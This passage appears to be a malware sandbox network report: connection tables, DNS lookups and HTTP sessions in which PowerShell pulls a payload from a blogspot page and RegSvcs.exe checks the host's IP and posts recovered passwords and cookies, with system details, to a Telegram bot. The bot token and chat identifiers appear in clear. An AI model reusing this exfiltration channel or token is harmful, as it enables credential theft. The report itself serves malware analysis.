                                                                                                                          Apr 25, 2024 19:01:41.154707909 CEST8049738142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.155946016 CEST4973880192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.157087088 CEST4973880192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.267148972 CEST8049738142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.287103891 CEST8049738142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.287133932 CEST8049738142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.287193060 CEST4973880192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.291205883 CEST49739443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.291248083 CEST44349739142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.291311026 CEST49739443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.295547962 CEST49739443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.295563936 CEST44349739142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.524589062 CEST44349739142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.524657011 CEST49739443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.525755882 CEST44349739142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.525804043 CEST49739443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.529577017 CEST49739443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.529584885 CEST44349739142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.529917002 CEST44349739142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.537853956 CEST49739443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.584117889 CEST44349739142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.767846107 CEST44349739142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.768177986 CEST44349739142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.768230915 CEST49739443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.768632889 CEST49739443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.769063950 CEST49740443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.769112110 CEST44349740142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.769181013 CEST49740443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.769539118 CEST49740443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:41.769553900 CEST44349740142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:41.997226000 CEST44349740142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:42.004463911 CEST49740443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:42.004507065 CEST44349740142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:42.398238897 CEST44349740142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:42.398412943 CEST44349740142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:42.398510933 CEST49740443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:42.398545980 CEST44349740142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:42.398593903 CEST44349740142.251.15.132192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:42.398652077 CEST49740443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:42.399827003 CEST49740443192.168.2.5142.251.15.132
                                                                                                                          Apr 25, 2024 19:01:47.433654070 CEST4973880192.168.2.5142.251.15.132
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Apr 25, 2024 19:01:20.870891094 CEST5154453192.168.2.51.1.1.1
                                                                                                                          Apr 25, 2024 19:01:20.981278896 CEST53515441.1.1.1192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:23.482557058 CEST6305353192.168.2.51.1.1.1
                                                                                                                          Apr 25, 2024 19:01:23.601933956 CEST53630531.1.1.1192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:24.996268988 CEST6100153192.168.2.51.1.1.1
                                                                                                                          Apr 25, 2024 19:01:25.106534958 CEST53610011.1.1.1192.168.2.5
                                                                                                                          Apr 25, 2024 19:01:26.134485006 CEST6280753192.168.2.51.1.1.1
                                                                                                                          Apr 25, 2024 19:01:26.246345043 CEST53628071.1.1.1192.168.2.5
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Apr 25, 2024 19:01:20.870891094 CEST192.168.2.51.1.1.10x544fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:23.482557058 CEST192.168.2.51.1.1.10xef5eStandard query (0)minecap4-22-24.blogspot.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:24.996268988 CEST192.168.2.51.1.1.10xedaStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:26.134485006 CEST192.168.2.51.1.1.10xe57dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Apr 25, 2024 19:01:16.197289944 CEST1.1.1.1192.168.2.50x3b0aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:16.197289944 CEST1.1.1.1192.168.2.50x3b0aNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:20.981278896 CEST1.1.1.1192.168.2.50x544fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:20.981278896 CEST1.1.1.1192.168.2.50x544fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:20.981278896 CEST1.1.1.1192.168.2.50x544fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:23.601933956 CEST1.1.1.1192.168.2.50xef5eNo error (0)minecap4-22-24.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:23.601933956 CEST1.1.1.1192.168.2.50xef5eNo error (0)blogspot.l.googleusercontent.com142.251.15.132A (IP address)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:25.106534958 CEST1.1.1.1192.168.2.50xedaNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                          Apr 25, 2024 19:01:26.246345043 CEST1.1.1.1192.168.2.50xe57dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                          • api.ipify.org
                                                                                                                          • minecap4-22-24.blogspot.com
                                                                                                                          • api.telegram.org
                                                                                                                          • ip-api.com
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.549716142.251.15.132807196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Apr 25, 2024 19:01:23.732165098 CEST176OUTGET /haha HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                          Host: minecap4-22-24.blogspot.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Apr 25, 2024 19:01:23.887087107 CEST722INHTTP/1.1 301 Moved Permanently
                                                                                                                          Location: https://minecap4-22-24.blogspot.com/haha
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Date: Thu, 25 Apr 2024 17:01:23 GMT
                                                                                                                          Expires: Thu, 25 Apr 2024 17:01:23 GMT
                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Content-Security-Policy: frame-ancestors 'self'
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Server: GSE
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Data Raw: 66 39 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 69 6e 65 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 68 61 68 61 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                                                                                          Data Ascii: f9<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Permanently</H1>The document has moved <A HREF="https://minecap4-22-24.blogspot.com/haha">here</A>.</BODY></HTML>
                                                                                                                          Apr 25, 2024 19:01:23.887149096 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.549719208.95.112.1806096C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Apr 25, 2024 19:01:25.232599974 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                          Host: ip-api.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Apr 25, 2024 19:01:25.357310057 CEST174INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 25 Apr 2024 17:01:24 GMT
                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                          Content-Length: 5
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Ttl: 60
                                                                                                                          X-Rl: 44
                                                                                                                          Data Raw: 74 72 75 65 0a
                                                                                                                          Data Ascii: true


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.549738142.251.15.132807876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Apr 25, 2024 19:01:41.157087088 CEST176OUTGET /haha HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                          Host: minecap4-22-24.blogspot.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Apr 25, 2024 19:01:41.287103891 CEST722INHTTP/1.1 301 Moved Permanently
                                                                                                                          Location: https://minecap4-22-24.blogspot.com/haha
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Date: Thu, 25 Apr 2024 17:01:41 GMT
                                                                                                                          Expires: Thu, 25 Apr 2024 17:01:41 GMT
                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Content-Security-Policy: frame-ancestors 'self'
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Server: GSE
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Data Raw: 66 39 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 69 6e 65 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 68 61 68 61 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                                                                                          Data Ascii: f9<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Permanently</H1>The document has moved <A HREF="https://minecap4-22-24.blogspot.com/haha">here</A>.</BODY></HTML>
                                                                                                                          Apr 25, 2024 19:01:41.287133932 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.549712172.67.74.1524436096C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-25 17:01:21 UTC155OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                          Host: api.ipify.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-04-25 17:01:24 UTC211INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 25 Apr 2024 17:01:24 GMT
                                                                                                                          Content-Type: text/plain
                                                                                                                          Content-Length: 14
                                                                                                                          Connection: close
                                                                                                                          Vary: Origin
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 879fe500fc5f1d68-ATL
                                                                                                                          2024-04-25 17:01:24 UTC14INData Raw: 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30
                                                                                                                          Data Ascii: 185.152.66.230


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.549717142.251.15.1324437196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-25 17:01:24 UTC176OUTGET /haha HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                          Host: minecap4-22-24.blogspot.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-04-25 17:01:24 UTC434INHTTP/1.1 301 Moved Permanently
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Location: /atom.xml
                                                                                                                          Date: Thu, 25 Apr 2024 17:01:24 GMT
                                                                                                                          Expires: Thu, 25 Apr 2024 17:01:24 GMT
                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Server: GSE
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-04-25 17:01:24 UTC224INData Raw: 64 61 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 2f 61 74 6f 6d 2e 78 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                                                                                          Data Ascii: da<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Permanently</H1>The document has moved <A HREF="/atom.xml">here</A>.</BODY></HTML>
                                                                                                                          2024-04-25 17:01:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.549718142.251.15.1324437196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-25 17:01:24 UTC156OUTGET /atom.xml HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                          Host: minecap4-22-24.blogspot.com
                                                                                                                          2024-04-25 17:01:24 UTC562INHTTP/1.1 200 OK
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Date: Thu, 25 Apr 2024 17:01:24 GMT
                                                                                                                          Content-Type: application/atom+xml; charset=UTF-8
                                                                                                                          Server: blogger-renderd
                                                                                                                          Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Expires: Thu, 25 Apr 2024 17:01:25 GMT
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          Last-Modified: Mon, 22 Apr 2024 17:27:39 GMT
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-04-25 17:01:24 UTC693INData Raw: 35 61 31 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 3f 78 6d 6c 2d 73 74 79 6c 65 73 68 65 65 74 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 73 74 79 6c 65 73 2f 61 74 6f 6d 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3f 3e 3c 66 65 65 64 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 35 2f 41 74 6f 6d 27 20 78 6d 6c 6e 73 3a 6f 70 65 6e 53 65 61 72 63 68 3d 27 68 74 74 70 3a 2f 2f 61 39 2e 63 6f 6d 2f 2d 2f 73 70 65 63 2f 6f 70 65 6e 73 65 61 72 63 68 72 73 73 2f 31 2e 30 2f 27 20 78 6d 6c 6e 73 3a 62 6c 6f 67 67 65 72 3d 27 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 67
                                                                                                                          Data Ascii: 5a1<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.g
                                                                                                                          2024-04-25 17:01:24 UTC755INData Raw: 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 66 65 65 64 73 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 27 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 65 6c 66 27 20 74 79 70 65 3d 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 66 65 65 64 73 2f 33 34 30 38 34 33 37 37 30 35 34 39 33 33 38 34 33 37 38 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 3f 61 6c 74 3d 61 74 6f 6d 27 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 61 6c 74 65 72 6e 61 74 65 27 20 74 79 70 65 3d 27 74 65 78 74 2f 68 74 6d 6c 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 69 6e 65 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 27 2f
                                                                                                                          Data Ascii: cap4-22-24.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/3408437705493384378/posts/default?alt=atom'/><link rel='alternate' type='text/html' href='https://minecap4-22-24.blogspot.com/'/
                                                                                                                          2024-04-25 17:01:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.549720149.154.167.2204436096C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-25 17:01:26 UTC260OUTPOST /bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=---------------------------8dc6566aab26a81
                                                                                                                          Host: api.telegram.org
                                                                                                                          Content-Length: 975
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-04-25 17:01:27 UTC975OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 36 36 61 61 62 32 36 61 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 34 34 34 39 36 39 38 36 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 36 36 61 61 62 32 36 61 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 35 2f 32 30 32 34 20 32 30 3a 33 31 3a 32 30 0a 55 73 65 72
                                                                                                                          Data Ascii: -----------------------------8dc6566aab26a81Content-Disposition: form-data; name="chat_id"6444969864-----------------------------8dc6566aab26a81Content-Disposition: form-data; name="caption"New PW Recovered!Time: 04/25/2024 20:31:20User
                                                                                                                          2024-04-25 17:01:27 UTC25INHTTP/1.1 100 Continue
                                                                                                                          2024-04-25 17:01:27 UTC1153INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Thu, 25 Apr 2024 17:01:27 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 765
                                                                                                                          Connection: close
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                          {"ok":true,"result":{"message_id":275,"from":{"id":6350883303,"is_bot":true,"first_name":"CPA_APRIL_24_bot","username":"CPA_APRIL_24_bot"},"chat":{"id":6444969864,"first_name":"Duke","last_name":"Habibi","username":"niggaman007","type":"private"},"date":1714064487,"document":{"file_name":"user-226546 2024-04-25 20-31-20.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBE2YqjGemz1DFVlIUl8s_IMB61FDWAALqFQACCn1YUS920hhefEzxNAQ","file_unique_id":"AgAD6hUAAgp9WFE","file_size":350},"caption":"New PW Recovered!\n\nTime: 04/25/2024 20:31:20\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 185.152.66.230","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.549721149.154.167.2204436096C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-25 17:01:27 UTC236OUTPOST /bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=---------------------------8dc6578c6979a5e
                                                                                                                          Host: api.telegram.org
                                                                                                                          Content-Length: 914
                                                                                                                          Expect: 100-continue
                                                                                                                          2024-04-25 17:01:28 UTC914OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 37 38 63 36 39 37 39 61 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 34 34 34 39 36 39 38 36 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 37 38 63 36 39 37 39 61 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 35 2f 32 30 32 34 20 32 32 3a 34 30 3a 35 38 0a 55 73 65 72
                                                                                                                          Data Ascii: -----------------------------8dc6578c6979a5eContent-Disposition: form-data; name="chat_id"6444969864-----------------------------8dc6578c6979a5eContent-Disposition: form-data; name="caption"New CO Recovered!Time: 04/25/2024 22:40:58User
                                                                                                                          2024-04-25 17:01:28 UTC25INHTTP/1.1 100 Continue
                                                                                                                          2024-04-25 17:01:28 UTC1153INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Thu, 25 Apr 2024 17:01:28 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 765
                                                                                                                          Connection: close
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
